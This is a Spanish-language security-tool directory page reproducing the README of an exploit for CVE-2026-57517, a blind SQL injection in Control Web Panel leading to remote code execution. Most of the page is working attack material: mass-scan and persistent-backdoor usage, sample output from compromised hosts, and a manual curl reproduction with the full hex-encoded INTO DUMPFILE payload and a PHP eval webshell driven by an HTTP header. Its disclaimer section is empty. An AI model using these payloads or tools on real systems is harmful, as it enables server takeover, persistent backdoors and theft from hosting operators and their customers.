Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-57517 — 💉 Inyección SQL ciega → Exploit de RCE para Control Web Panel (CWP) ≤ 0.9.8.1224 — userRes POST → INTO DUMPFILE → cwpsvc shell | Kitploit
Herramientas/GitHubGitHub/shinthink/cve-2026-57517
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubshinthink/cve-2026-57517

CVE-2026-57517

💉 Inyección SQL ciega → Exploit de RCE para Control Web Panel (CWP) ≤ 0.9.8.1224 — userRes POST → INTO DUMPFILE → cwpsvc shell

Ver Repositorio
119hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-57517 — Control Web Panel Inyección SQL Ciega → RCE

Python CVE CVSS License

Control Web Panel ≤ 0.9.8.1224 — Inyección SQL Ciega a Ejecución Remota de Código

Puerto 2083 → userRes POST → INTO DUMPFILE → Puerto 2031 Webshell → cwpsvc



🔴 Resumen de la Vulnerabilidad

CVE-2026-57517 es una inyección SQL ciega crítica previa a la autenticación en Control Web Panel (CWP) versiones ≤ 0.9.8.1224. El parámetro userRes POST en el endpoint del panel de usuario no es sanitizado antes de ser insertado en una consulta SQL. Las consultas se ejecutan con privilegios root de MySQL — que posee el privilegio global FILE — permitiendo a los atacantes escribir archivos arbitrarios mediante INTO DUMPFILE.

La cadena de explotación típica despliega un webshell PHP en el directorio de logs de Roundcube accesible por web, logrando ejecución remota de código como la cuenta de servicio cwpsvc.

CampoDetalle
CVECVE-2026-57517
CVSS9.8 (Crítico) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TipoCWE-89 — Inyección SQL Ciega (Pre-Auth)
AfectadoControl Web Panel ≤ 0.9.8.1224
CorregidoVersión 0.9.8.1225
Divulgación1 de julio de 2026
InvestigadorEgidio Romano (Karma In Security)
PoCPúblico — KIS-2026-12

📦 Instalación

git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt

📖 Uso

# Objetivo único (detección automática de usuario)
python cve_2026_57517.py -t 192.168.1.100

# Objetivo único con usuario conocido
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc

# Escaneo masivo
python cve_2026_57517.py -f targets.txt -o live.txt

# Shell interactivo
python cve_2026_57517.py -t target.com --rce -u cwpsvc

# Backdoor persistente (sin limpieza automática)
python cve_2026_57517.py -t target.com --no-cleanup
  -t, --target      Host objetivo único
  -f, --file        Archivo con objetivos (uno por línea)
  -u, --username    Nombre de usuario de CWP (salta detección automática)
  -o, --output      Archivo de salida TXT en vivo
  --json            Archivo de informe JSON
  --threads         Trabajadores concurrentes (predeterminado: 20)
  --timeout         Tiempo de espera de solicitud en segundos (predeterminado: 15)
  --no-cleanup      Dejar shells en el objetivo
  --rce             Modo shell interactivo
  -v, --verbose     Salida detallada

🧪 Prueba de Concepto

Escenario 1: Escaneo Masivo

$ python cve_2026_57517.py -f targets.txt -o live.txt -v
────────────────────────────────────────────────────────────
  CVE-2026-57517 | 5 objetivos | 20 hilos
  Limpieza: sí
  TXT en vivo: live.txt
────────────────────────────────────────────────────────────

  ✅ 192.168.10.100:2083  [rce_confirmed]  18.2s
     User  : admin
     Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
     RCE   : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
             cwp-prod-01.example.com
     whoami: cwpsvc

  ⚠️ 192.168.10.200:2083  [sqli_failed]  12.1s
     User  : cwpsvc
     Error : SQL injection failed — target may be patched or path not writable

  · 192.168.10.50:2083  [not_cwp]  2.3s

==================================================
  RESUMEN DEL ESCANEO
==================================================
  Total      : 5
  ✅ RCE      : 2
  ⚠️  SQLi Fail : 1
  🔍 No User  : 1
  ·  Not CWP  : 1
==================================================

Escenario 2: Shell Interactivo

$ python cve_2026_57517.py -t target.com --rce -u admin
  CWP Interactive Shell — target.com
  Type 'exit' to quit, 'cleanup' to remove shell

cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)

cwp$ hostname
cwp-prod-01

cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash

cwp$ exit

Escenario 3: Reproducción Manual (curl)

Paso 1 — Verificar que CWP es accesible en el puerto 2083

curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'

Paso 2 — Validar nombre de usuario

curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = el usuario existe

Paso 3 — Inyección SQL mediante userRes

El payload utiliza un UNION SELECT de 13 columnas con un shell PHP codificado en hexadecimal escrito mediante INTO DUMPFILE:

" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
# La herramienta maneja la codificación hexadecimal automáticamente. Equivalente manual:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'

curl -sk 'https://target.com:2083/admin/' \
  -d "userRes=$PAYLOAD"

Paso 4 — Ejecutar comandos mediante webshell (puerto 2031)

El shell PHP desplegado lee comandos del encabezado HTTP C::

<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
# Codificar en base64: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)

curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)

Desglose del Payload

ComponenteValor
Columnas SQLUNION SELECT de 13 columnas
Shell PHP<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
Codificación hexadecimalLiteral hexadecimal 0x... de MySQL
Método de escrituraINTO DUMPFILE (escritura binaria exacta)
Ruta de destino/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php
Entrega de comandosEncabezado HTTP C: con PHP codificado en base64
Ejecutor de comandospassthru(base64_decode('{cmd}'))

⚠️ Descargo de Responsabilidad

Descargar herramienta